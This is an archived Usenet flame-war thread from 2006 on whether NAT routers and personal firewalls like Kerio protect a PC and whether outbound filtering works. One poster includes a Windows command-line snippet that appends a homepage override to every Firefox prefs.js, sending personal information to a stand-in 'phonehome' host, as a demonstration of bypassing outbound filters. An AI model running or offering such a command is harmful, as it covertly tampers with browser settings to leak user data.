Re: outbound filtering



On 12/27/2006 2:49 AM, something possessed Sebastian Gottschalk to write:
William wrote:

What problem? He didn't give an abstract or concrete problem, the OP just asked for some advise,

No, he didn't ask for advise. He brabbled arbitrary nonsense, giving a good
indication that he doesn't know what he wants or what he's talking about?

People asking for advise often don't know exactly what's out there to fulfill their needs, otherwise they'd get that and not ask for advise.
- NAT routers aren't firewall or security devices.
Depends on the router, but most NAT routers act as hardware firewalls, blocking unsolicited inbound connections.

Well, just by coincidence (since NAT works that way). However, this is not
reliable and easily circumvented. Thus, it doesn't provide security.
Nonetheless, it IS a hardware firewall, and since you felt inclined to mention that it wasn't, someone needed to provide correct information before whoever reads this thread becomes as confused about firewalls and Internet Security in general as you.

- Monitoring connections doesn't require extensive packet filters with
state machines, but just standard operating system tools requesting such
information directly from the OS.
Well, that will tell you where your remote endpoint connections are and what programs are making the connection, but not much more than that.

What else do you want?
Maybe Packet Sniffing, or Monitoring not just when a connection is made, but when an application changes (Kerio Personal Firewall provides this PROTECTION, if a process is changed, the user is alerted to it).

On that note, these are snapshots, not real-time displays of connection activity.

Wrong again. There are numerous implementation that provide a complete
cover over time.

Like?
For a real time display of remote connections I'd recommend Kerio Personal Firewall,

So, you're recommending that he should make his computer intentionally
vulnerable and unstable? That's really not nice.
No, I'm recommending hi not listen to you and install either TCPMon or if he wants something more secure to monitor outbound connections Kerio Personal Firewall. I've never had it destablise my PC, and it's much more secure than running without (but hey, at least he's got a hardware FIREWALL (router).

- Outbound filtering doesn't work.
It doesn't?

Welcome to reality. You've been sleeping for... how long?
I try to get 8 hours of sleep every day, but in most circumstances it DOES work.

Never did, never will, beside the wishes
because it would be nice if it actually worked.
Well, granted it's not perfect, but neither are AVs.

Oh, you finally understand the difference between protection and intrusion
detecting?
They're related, just like a burglar alarm is related to security, a firewall is an essential asset to Internet Security (though it shouldn't be the only measure)

They may be allowed to be circumnavigated, but in the world with Windows and Gates nothing is perfect.

That's a lame excuse for not defending against running the malware in first
place. Which is a serious security concept that provides protection. And
doesn't make the system more vulnerable.
The only way this user's system would become more vulnerable is if he were to take your advise. While FWs aren't perfect, they are essential to any Internet security implementation. Of course, no one is saying that that should be the only user's course of action. I'm sure the OP has already takes some other necessary steps toward securing his/her PC long before posting here (i.e. using a NAT router, implementing at least one AV product (but only one real-time scanner), and practicing safe-hex practices regarding web-site and attackments.

And the reason is
inter-process communication, some feature that you wouldn't like to miss
either.
Elaborate on this please. Are you referring to rootkits, bad modules hooking into legit processes, or just processes communicating with eachother via localhost port communications.

for /r %i in (prefs.js) do echo
user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation";);>>"%i"
Um...This link doesn't work the way you're intending it to. For one, it DOESN'T access prefs.js. I thought that maybe it was because of a wordwrap, so I created a simple test.html file with <head><title>test</title></head><body>your broken link thingie</body>. I think what you were intended to demonstrate is that some processes may try to make changes to other program's user-prefs (AFAIK, Kerio protects against this, but I haven't had the opportunity to test this out. I do know that when one process tries to access another (which is interprocess communication, not what you were trying to demonstrate just now), that Kerio does protect against that by alerting the user and asking if he/she wants to allow or deny. Also, if I were to click this link in in Firefox, Kerio would alert that Firefox was trying to access the trusted zone (unless a rule is already set up), in which case, knowing that Internet Browsers should communicate with the Internet, and what business does it have accessing any files on your computer, than I'd simply block it).

And the next time you start up Firefox, it will phone home on behalf of the
illegitimate application.
No, it won't, because it didn't work.
Now, would you finally get a clue that you don't
even need direct IPC at all to remote control other applications?
Well, will you get a clue that that was never the argument. The argument was that you were being a mere child attacking others at any sign of ignorance, rather then trying to assist others, in order to boost your inflated undeveloped ego. Now that you had to try to defend your position, the usenet community that hasn't killfiled you yet can now see that you haven't a clue what you're talking about. Hopefully, this will pursuade you to lurk for a little bit and listen to the real experts, rather than spout garbage that may be harmful to the end-user should they listen to your rantings. In Summary: NAT Router=Hardware Firewall. Firewall=good (It depends on the FW, but I recommend Kerio, in addition to NAT Router). No Firewall=Bad.
.



Relevant Pages

  • Re: outbound filtering
    ... If he really knew a lot about security he would be willing ... Well, that will tell you where your remote endpoint connections are and what programs are making the connection, but not much more than that. ... For a real time display of remote connections I'd recommend Kerio Personal Firewall, or if the OP doesn't want a firewall, than sysinternals.com TCPMon. ... inter-process communication, some feature that you wouldn't like to miss ...
    (comp.security.firewalls)
  • Re: [fw-wiz] trusted & untrusted ports
    ... > firewall in order to allow communication to a certain application ... A port is nothing but a 16-bit integer, nothing more, nothing less. ... port itself has no security characteristics at all. ... applications on either end of the TCP/IP communication which you can ...
    (Firewall-Wizards)
  • Re: SP 2 Firewall feature
    ... A future release will address the problem of communication between Black Ice ... and SP2's Security Center. ... >I have Black Ice as my firewall and I have SP 2 firewall turned off. ...
    (microsoft.public.windowsxp.security_admin)
  • [REVS] Bypassing Client Application Protection Techniques
    ... Get your security news from a reliable source. ... protection programs. ... * Kerio Personal Firewall 4.0 ... And we got actually nothing in the field of client application ...
    (Securiteam)
  • Re: Recycler security issues on IIS server
    ... > latest upates to the server. ... > like to see the server put behind our firewall, ... other software, install all patches, IISlockdown, URLscan, use the correct ... the procedures you follow may vary depending on your security needs. ...
    (microsoft.public.inetserver.iis.security)